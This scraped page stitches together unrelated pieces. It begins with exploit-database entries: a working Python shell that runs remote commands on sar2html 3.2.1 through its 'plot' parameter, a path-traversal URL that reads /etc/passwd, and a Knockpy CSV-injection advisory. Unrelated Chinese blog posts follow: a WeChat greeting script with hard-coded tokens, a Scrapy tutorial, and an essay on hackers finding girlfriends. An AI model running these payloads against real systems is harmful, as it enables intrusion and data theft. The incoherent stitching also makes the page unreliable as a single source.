# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
# Date: 27-12-2020
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Ubuntu 18.04.1
#!/usr/bin/env python3
import requests
import re
from cmd import Cmd

url = input("Enter The url => ")

class Terminal(Cmd):
    prompt = "Command => "
    def default(self, args):
        exploiter(args)

def exploiter(cmd):
    global url
    sess = requests.session()
    output = sess.get(f"{url}/index.php?plot=;{cmd}")
    try:
        out = re.findall("<option value=(.*?)>", output.text)
    except:
        print ("Error!!")
    for ouut in out:
        if "There is no defined host..." not in ouut:
            if "null selected" not in ouut:
                if "selected" not in ouut:
                    print (ouut)
    print ()

if __name__ == ("__main__"):
    terminal = Terminal()
    terminal.cmdloop()
# Exploit Title: Advanced Comment System 1.0 - 'ACS_path' Path Traversal
# Date: Fri, 11 Dec 2020
# Exploit Author: Francisco Javier Santiago Vázquez aka "n0ipr0cs"
# Vendor Homepage: Advanced Comment System - ACS
# Version: v1.0
# CVE: CVE-2020-35598
http://localhost/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
# Exploit Title: Knockpy 4.1.1 - CSV Injection
# Author: Dolev Farhi
# Date: 2020-12-29
# Vendor Homepage: https://github.com/guelfoweb/knock
# Version : 4.1.1
# Tested on: Debian 9.13
Knockpy, as part of its subdomain brute forcing flow of a remote domain, issues a HEAD request to the server to fetch details such as headers, status code, etc.
When the -c flag is used to store the results as a CSV file, that data is written to the file with the Server HTTP response header unfiltered.
Vulnerable code segment(s)
# knockpy.py
# row = ip+'\t'+str(data['status'])+'\t'+'host'+'\t'+str(data['hostname'])+get_tab(data['hostname'])+str(server_type)
# subdomain_csv_list.append(ip+','+str(data['status'])+','+'host'+','+str(data['hostname'])+','+str(server_type))
# modules/save_report.py
# if fields:
# csv_report += 'ip,status,type,domain_name,server\n'
# for item in report:
# csv_report += item + '\n'
# report = csv_report
1. Example malicious Nginx config to return CSV formula headers:
http {
    ...
    server_tokens off;
    more_set_headers 'Server: =1336+1';
    ...
}
2. Tester runs Knockpy
root@host:~/# python knockpy/knockpy.py -c test.local
+ checking for virustotal subdomains: SKIP
VirusTotal API_KEY not found
+ checking for wildcard: NO
+ checking for zonetransfer: NO
+ resolving target: YES
- scanning for subdomain...
Ip Address Status Type Domain Name Server
---------- ------ ---- ----------- ------
127.0.0.1 200 host appserver.test.local =1336+1
CSV result
root@host:~/# cat test_local.csv
127.0.0.1,200,host,appserver.test.local,=1336+1
127.0.0.1,200,host,www.test.local,=1336+1
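The missing output filter, sketched as an added defensive example (this is not Knockpy's code and not part of the original advisory): rows are written with `csv.writer` instead of string concatenation, and any cell that a spreadsheet would evaluate as a formula is prefixed with a single quote. The names `neutralize_cell` and `build_csv_report` are hypothetical, and the sample rows are constructed from the CSV result above.

```python
import csv
import io

# Leading characters that make spreadsheet applications evaluate a cell.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Return the value as text that a spreadsheet will not evaluate."""
    text = str(value)
    # Ignore leading spaces when checking, since a spreadsheet may trim them.
    if text.lstrip(" ").startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def build_csv_report(rows, fields=True):
    """Build the report with csv.writer instead of joining fields with ','."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    if fields:
        writer.writerow(["ip", "status", "type", "domain_name", "server"])
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample rows: the first mirrors the CSV result shown above,
# the second carries a Server value containing a comma and double quotes.
SAMPLE_ROWS = [
    ("127.0.0.1", 200, "host", "appserver.test.local", "=1336+1"),
    ("127.0.0.1", 200, "host", "www.test.local", 'nginx, "custom"'),
]

if __name__ == "__main__":
    print(build_csv_report(SAMPLE_ROWS), end="")
```

Quoting every field also keeps a Server value that contains commas or quotes from shifting the columns of the report.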
We usually use QQ Mail or 163 Mail for email. In contact details that does not look high-end enough, and it is not impressive enough to show off. So here is how to set up an email address on your own domain name, and let the glory of showing off light up the Internet!
Preparation
Activate Tencent Enterprise Email Service's own domain name
Activate Tencent Enterprise Email Service
Enter Tencent Enterprise Email Official Website and click Register.
Fill in the information to register the company WeChat account. You can fill in any part of the information, because it does not require review. At the same time, you need to bind a WeChat account as the administrator.
Bind your own domain name
Experience

Subrion CMS 4.2.1 - 'avatar[path]' XSS

Click2Magic 1.1.5 - Stored Cross-Site Scripting

Responsive E-Learning System 1.0 - 'id' Sql Injection

Responsive FileManager 9.13.4 - 'path' Path Traversal

Cassandra Web 0.5.0 - Remote File Read

Online Learning Management System 1.0 - RCE (Authenticated)

Fluentd TD-agent plugin 4.0.1 - Insecure Folder Permission

Title: What to do if your girlfriend gets angry?
Configuration
First visit the following link and scan the QR code with your WeChat to authorize the login: https://mp.weixin.qq.com/debug/cgi-bin/sandbox?t=sandbox/login
Record the appID and appsecret values you obtain!
Then scroll down and add a new test template.
Add the template title and template content:
{{first.DATA}}
Today's weather: {{keyword1.DATA}}
Today's temperature: {{keyword2.DATA}}
We are already in love: {{keyword3.DATA}}
There is still {{keyword4.DATA}}
{{remark.DATA}}
After the addition is complete, record the template ID
Then ask your girlfriend to follow the test official account, get the WeChat account and record it.
Get the weather interface
Visit the following link http://www.tianqiapi.com/
Register and log in, get the appid and appsecret and record them, then test the weather information for your local city.
The API interface is as follows:
https://www.yiketianqi.com/free/day?appid=your id&appsecret=your value&unescape=1&city=%E5%85%B0%E5%B7%9E
Get sweet talk interface
Visit www.alapi.cn, register and log in. Get the token and record it.
The API interface is as follows:
https://v2.alapi.cn/api/qinghua?token=Your value
Configure PHP
<?php
$appId = '1'; // Fill in your own appId
$appSecret = '2'; // Fill in your own appSecret
$wxgzhurl = 'https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=' . $appId . '&secret=' . $appSecret;
$access_token_Arr = https_request($wxgzhurl);
$access_token = json_decode($access_token_Arr, true);
$ACCESS_TOKEN = $access_token['access_token']; // ACCESS_TOKEN

// The date you started dating (keep the date format)
$lovestart = strtotime('2022-08-01');
$end = time();
$love = ceil(($end - $lovestart) / 86400);

// The date of the next birthday (keep the date format)
$birthdaystart = strtotime('2023-01-25');
$end = time();
$diff_days = ($birthdaystart - $end);
$birthday = (int)($diff_days / 86400);
$birthday = str_replace('-', '', $birthday);

$tianqiurl = 'https://www.yiketianqi.com/free/day?appid=95943915&appsecret=5KNSKu9y&unescape=1&city=Wuhan'; // Change to your own
$tianqiapi = https_request($tianqiurl);
$tianqi = json_decode($tianqiapi, true);

$qinghuaqiurl = 'https://v2.alapi.cn/api/qinghua?token=BFlSa9Ny7qTZHwYk'; // Change to your own
$qinghuaapi = https_request($qinghuaqiurl);
$qinghua = json_decode($qinghuaapi, true);

// A sentence from you
$yjh = ''; // Leave it blank or write a sentence of your own
$touser = 'oOBhas1F-h6rP9DxsTZGCP7xgjeQ'; // Fill in your girlfriend's openid
$data = array(
    'touser' => $touser,
    'template_id' => 'ujSRYGrQep4A8o0JCyW4pdy5cZ0YXrT6QXwMZC5tAf1111111111111110', // Change to your own template ID (see the template messages in the WeChat backend)
    'data' => array(
        'first' => array(
            'value' => $yjh,
            'color' => '#000'
        ),
        'keyword1' => array(
            'value' => $tianqi['wea'],
            'color' => '#000'
        ),
        'keyword2' => array(
            'value' => $tianqi['tem_day'],
            'color' => '#000'
        ),
        'keyword3' => array(
            'value' => $love . 'day',
            'color' => '#000'
        ),
        'keyword4' => array(
            'value' => $birthday . 'day',
            'color' => '#000'
        ),
        'remark' => array(
            'value' => $qinghua['data']['content'],
            'color' => '#f00'
        ),
    )
);

// Nothing below this line needs to be changed
$json_data = json_encode($data);
$url = 'https://api.weixin.qq.com/cgi-bin/message/template/send?access_token=' . $ACCESS_TOKEN;
$res = https_request($url, urldecode($json_data));
$res = json_decode($res, true);
// A successful send returns errcode 0 and errmsg "ok"
if ($res['errcode'] == 0 && $res['errmsg'] == 'ok') {
    echo 'Send successfully! <br/>';
} else {
    echo 'Send failed! Please check the code! <br/>';
}

// Send a GET request, or a POST request when $data is given, and return the response body
function https_request($url, $data = null)
{
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    // Keep TLS certificate and host name verification enabled
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, true);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2);
    if (!empty($data)) {
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
    }
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    $output = curl_exec($curl);
    curl_close($curl);
    return $output;
}
After modifying the PHP file, upload it to a local or remote server and open the link to test it. If it reports that the message was sent successfully, the configuration is complete!
Add a timed task
If you want the first message your girlfriend receives when she wakes up in the morning to be a greeting from you, you must set up a scheduled task.
The command is as follows:
00 08 * * * /usr/bin/curl https://bbskali.cn/love.php
That is, https://bbskali.cn/love.php is visited at 8:00 every day.
That's it, your daily care for your girlfriend is set up!
Effect

IncomCMS 2.0 - Insecure File Upload

Arteco Web Client DVR/NVR - 'SessionId' Brute Force

Title: Getting Started with Scrapy Crawler
Installation
Kali already has a Python environment installed, so we can install Scrapy directly with the following command.
pip install Scrapy
Isn't the installation very easy?
Now we will demonstrate how to crawl through the official small demo.
Save the following file as a 22.py file
import scrapy


class QuotesSpider(scrapy.Spider):
    name = 'quotes'
    start_urls = [
        'https://quotes.toscrape.com/tag/humor/',
    ]

    def parse(self, response):
        # Yield one item per quote block on the page
        for quote in response.css('div.quote'):
            yield {
                'author': quote.xpath('span/small/text()').get(),
                'text': quote.css('span.text::text').get(),
            }

        # Follow the link to the next page, if there is one
        next_page = response.css('li.next a::attr("href")').get()
        if next_page is not None:
            yield response.follow(next_page, self.parse)

Execute the following command:
scrapy runspider 22.py -o quotes.jl
The crawler results will be saved to the quotes.jl file. The data is saved in JSON format.
Crawler results
Code Analysis
Now we analyze the code
First, let's take a look at the official demo page.
Its markup is as follows:
<div class='quote' itemscope='' itemtype='http://schema.org/CreativeWork'>
    <span class='text' itemprop='text'>"The world as we have created it is a process of our thinking. It cannot be changed without changing our thinking."</span>
    <span>by <small class='author' itemprop='author'>Albert Einstein</small>
    <a href='/author/Albert-Einstein'>(about)</a>
    </span>
    <div class='tags'>
        Tags:
        <meta class='keywords' itemprop='keywords' content='change,deep-thoughts,thinking,world'>
        <a class='tag' href='/tag/change/page/1/'>change</a>
        <a class='tag' href='/tag/deep-thoughts/page/1/'>deep-thoughts</a>
        <a class='tag' href='/tag/thinking/page/1/'>thinking</a>
        <a class='tag' href='/tag/world/page/1/'>world</a>
    </div>
</div>
Now we analyze the crawler code
# Import the crawler module
import scrapy


class QuotesSpider(scrapy.Spider):
    # Define two variables, name and start_urls. start_urls is the target website of the crawler.
    name = 'quotes'
    start_urls = [
        'https://quotes.toscrape.com/',
    ]

    def parse(self, response):
        # Iterate over the elements whose CSS class is quote
        for quote in response.css('div.quote'):
            # Generate a dictionary containing the extracted quote text and author
            # Get the values of author and text under the div
            yield {
                'author': quote.xpath('span/small/text()').get(),
                'text': quote.css('span.text::text').get(),
            }

        # Find the link to the next page
        next_page = response.css('li.next a::attr("href")').get()
        if next_page is not None:
            yield response.follow(next_page, self.parse)
quote.xpath('span/small/text()') walks down from the target div to the span tag under it, then to the small tag under that span, and selects text(). The get() function returns its text value.
The markup is as follows:
<span>by <small class='author' itemprop='author'>Albert Einstein</small>
quote.css('span.text::text').get() gets the text of the span element whose CSS class is text.
The markup for this is as follows:
<span class='text' itemprop='text'>"The world as we have created it is a process of our thinking. It cannot be changed without changing our thinking."</span>
Similarly, we can write the expression that gets the values of the tag links.
<div class='tags'>
    <a class='tag' href='/tag/humor/page/1/'>humor</a>
</div>
'tags': quote.css('a.tag::text').getall()
Here getall() gets all of the matches.
A quick test
Here we crawl the member rankings in the Big Cousin forum as an example
import scrapy


class QuotesSpider(scrapy.Spider):
    name = 'quotes'
    start_urls = [
        'https://bbskali.cn/portal.php',
    ]

    def parse(self, response):
        for quote in response.css('div.z'):
            yield {
                'z': quote.xpath('p/a/text()').get(),
                'z1': quote.css('p::text').get(),
            }

        next_page = response.css('li.next a::attr("href")').get()
        if next_page is not None:
            yield response.follow(next_page, self.parse)
How about it, it’s simple!

WordPress Plugin WP-Paginate 2.1.3 - 'preset' Stored XSS

Online Movie Streaming 1.0 - Authentication Bypass

Baby Care System 1.0 - 'Post title' Stored XSS

Title: Will a hacker have a girlfriend?
First of all, this article does not apply to the second generation of officials or the second generation of the rich. If you are one of them, please ignore this article.
You in front of the screen are also in your youth and in the middle of your struggle. As someone who has been through it, Big Cousin will share his views on the things around him. I, Big Cousin, live in a small county town in the northwest and lead a nine-to-five working life. After work, I have shared some knowledge about network security and met many friends who like network security. Then many friends asked me: is there money in cybersecurity? Will there be a girlfriend?
I'll tell you the answer here
Money==Having a girlfriend==Having a wife
Yes, my answer may make you feel uncomfortable. Will you still have feelings? So what can you do in the face of reality today?
Just about the matter around my cousin, several of my friends are almost 30 years old and are at the age of discussing marriage. After a few girlfriends on blind dates, they ended up having a bad time. It's nothing more than a woman asking for a car or a house. In fact, in my opinion, it is not that the woman is too realistic, but that society has reached this point, just like we cannot do without smartphones. Besides, if you marry your daughter, would you compromise with reality?
Actually, in my opinion, the ultimate main problem is the job problem! Maybe you will say: I am a programmer, I am a big heikuo (hacker), I earn 400,000 yuan per month. Then let me tell you that in the eyes of the older generation, even an awesome programmer is just a computer repairman. In the eyes of parents, there are civil servants (with an official staff position), government departments, stable jobs (teachers, doctors), company bosses, ordinary jobs, and unemployed vagrants (big heikuo).
So the end of the work is the establishment, especially in the context of the epidemic. Is the establishment not popular?
Even a senior programmer can make a living from youth. After the age of 40, you will either be promoted to management or change careers.
After talking about the work, let’s talk about housing prices!
Regarding housing prices, I dare not talk too much about my opinion. Because I am also a person in the bureau, I don’t know which year or month it will end every month. Take our small county town as an example, the average house price is 5,500-6,300/square meter. I dare not mention the housing prices in Beijing, Shanghai and Guangzhou. If it is a 100 square meter apartment, the bare house price alone will cost about 60,000 yuan. Loans based on 0.25% of the housing provident fund. Pay a down payment of 200,000 yuan and a loan of 400 yuan. The loan will be 100,000 yuan in interest for 15 years. The decoration is calculated at 150,000 yuan, which means that if you find a girlfriend to get married, the house will cost (200,000 yuan down payment + 150 yuan decoration) to solve the problem of the wedding house. Leave the rest to time to digest.
Let's talk about the bride price after talking about the housing price
The bride price is unavoidable for every big heikuo who is discussing marriage. It varies from person to person depending on the region, the parents' level of education, and the place. Where Big Cousin lives, the bride price is 8.8w-40w from town to rural areas. This is also a lot of money for ordinary families.
As for the car, everyone knows it well, so I won’t mention it here.
Of course, for the premise of the above mentioned things, you must have a girlfriend who can talk about marriage. As a big heikuo, you don’t even have a girlfriend, so don’t mention the above.
The main reasons are as follows:
A lot of time is spent finding loopholes. I have been with computers and mobile phones for a long time and lacked communication, especially with the opposite sex. Long-term viewing of computers and mobile phones can cause baldness and high myopia. He does not pay attention to appearance, does not shave his beard, and wears the same clothes for three years. When I have money, I only know how to buy a 3090Ti graphics card, but I don't know how to spend money on gifts. Being with computers for a long time leads to a withdrawn and introverted personality. To sum up, once you have become a big heikuo, finding a sexy and beautiful girlfriend to be your wife is, it can be said, even more difficult. Unless the family conditions are very good, that is, you are either the second generation of officials or the second generation of the rich, you can consider it carefully. Otherwise, Big Cousin advises you that network security can only be regarded as an interest for learning and research, and it cannot be your main business.

CSZ CMS 1.2.9 - Multiple Cross-Site Scripting